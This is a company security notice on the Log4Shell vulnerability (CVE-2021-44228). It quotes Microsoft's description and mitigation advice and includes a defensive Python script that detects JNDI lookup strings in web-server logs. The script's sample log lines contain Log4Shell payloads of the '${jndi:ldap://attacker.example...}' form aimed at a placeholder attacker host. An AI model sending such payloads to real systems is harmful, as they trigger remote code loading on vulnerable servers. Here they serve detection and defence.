We have been reviewing the zero-day vulnerability CVE-2021-44228, disclosed on December 9, 2021, which was being actively targeted and exploited in the wild.
CVE-2021-44228 affects Java environments that use the Log4j 2 logging library. The Atlas solution provided by ClearPeople does not use any Java infrastructure, whether maintained by our clients or by ClearPeople, and is therefore not affected by this vulnerability.
Microsoft is in charge of maintaining the infrastructure behind Office 365. Although we cannot know whether that infrastructure uses Java at all, we are confident that Microsoft has taken the necessary measures to protect it against this and any other known vulnerability.
Below is a summary of Microsoft's knowledge about the CVE-2021-44228 vulnerability. This information, along with the other, far more detailed material Microsoft has published, shows its deep understanding of the issue. It may also help you evaluate whether you have other infrastructure (maintained by another provider) that could be affected.
Microsoft’s information about CVE-2021-44228
Microsoft is investigating attacks taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2 disclosed on December 9, 2021. The vulnerability, tracked as CVE-2021-44228 and referred to as “Log4Shell,” affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1.
Log4j 2 is a Java-based logging library that is widely used in business system development, included in various open-source libraries, and directly embedded in major software applications. The scope of impact has expanded to thousands of products and devices, including Apache products such as Struts 2, Solr, Druid, Flink, and Swift. Because this vulnerability is in a Java library, the cross-platform nature of Java means the vulnerability is exploitable on many platforms, including both Windows and Linux. As many Java-based applications can leverage Log4j 2, organizations should contact application and hardware vendors or ensure their Java applications are running the latest version. Developers using Log4j 2 should ensure that they are incorporating the latest version of Log4j into their applications as soon as possible to protect users and organizations.
The vulnerability can allow unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component.
The specially crafted string that triggers this vulnerability can be identified by several components. The string contains jndi, which refers to the Java Naming and Directory Interface. This is followed by a protocol such as ldap, ldaps, rmi, dns, or http, which in turn precedes the attacker-controlled domain.
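As an added illustration, not part of Microsoft's or ClearPeople's material, the following Python script scans constructed web-server log lines for lookup strings of the shape just described: the jndi prefix, one of the listed protocols, and a host. The log lines and the host name attacker.example are constructed placeholders, not observed indicators.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Protocols named in the advisory as preceding the attacker-controlled domain.
JNDI_PROTOCOLS = ("ldap", "ldaps", "rmi", "dns", "http")

# Matches a Log4j 2 lookup of the form ${jndi:<protocol>://<host>[:port][/path]}.
# Case-insensitive because the lookup prefix is not case-sensitive in Log4j 2.
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<proto>" + "|".join(JNDI_PROTOCOLS) + r")\s*:\s*//"
    r"(?P<host>[^/:\s}]+)(?::(?P<port>\d+))?(?P<path>[^}\s]*)\}",
    re.IGNORECASE,
)

@dataclass(frozen=True)
class JndiHit:
    line_no: int
    protocol: str
    host: str
    port: str  # empty string when the lookup carries no explicit port
    raw: str   # the matched lookup exactly as it appeared in the log line

def find_jndi_lookups(line_no: int, line: str) -> List[JndiHit]:
    """Return every jndi lookup found in a single log line (defender-side triage)."""
    return [
        JndiHit(line_no, m.group("proto").lower(), m.group("host").lower(),
                m.group("port") or "", m.group(0))
        for m in JNDI_PATTERN.finditer(line)
    ]

def scan_log(lines: Iterable[str]) -> List[JndiHit]:
    """Scan log lines in order and collect all hits with their 1-based line numbers."""
    hits: List[JndiHit] = []
    for n, line in enumerate(lines, start=1):
        hits.extend(find_jndi_lookups(n, line))
    return hits

# Constructed sample access-log lines (not real traffic); lines 2 and 3 carry lookups.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:08:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:01:09 +0000] "GET /?x=${jndi:rmi://attacker.example/obj} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.3 - - [10/Dec/2021:08:02:00 +0000] "GET /docs/log4j HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        port = f":{hit.port}" if hit.port else ""
        print(f"line {hit.line_no}: {hit.protocol}://{hit.host}{port}  <- {hit.raw}")
```

The pattern covers only the plain form the advisory describes, so treat its output as a triage aid for finding which hosts received lookup strings, not as proof that no other attempts occurred.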
Once the attacker has full access to and control of the application, they can pursue a myriad of objectives. Microsoft has observed post-exploitation activities including installing coin miners, deploying Cobalt Strike to enable credential theft and lateral movement, and exfiltrating sensitive data from systems.
Exploitation of this vulnerability takes advantage of the log4j2.formatMsgNoLookups option in the library's configuration being set to false. To mitigate this threat, upgrade instances of Log4j to version 2.15.0 and ensure that the log4j2.formatMsgNoLookups option in the library's configuration is set to true. Log4j versions 2.10.0 through 2.14.1 have this option set to false by default; if upgrading is not an option, manually set the option to true. All systems, including those that are not customer facing, are potentially vulnerable to this exploit, so backend systems and microservices should also be upgraded. For Apache Maven or Gradle projects, update Log4j to 2.15.0 in the project's dependency tree.
As Microsoft and the industry at large continue to gain a deeper understanding of the impact of this threat, we are publishing technical information that can help defenders detect, investigate, and mitigate attacks, as well as guidance for using Microsoft security solutions to increase resilience against related attacks. We will update this report with information and protection details as they become available.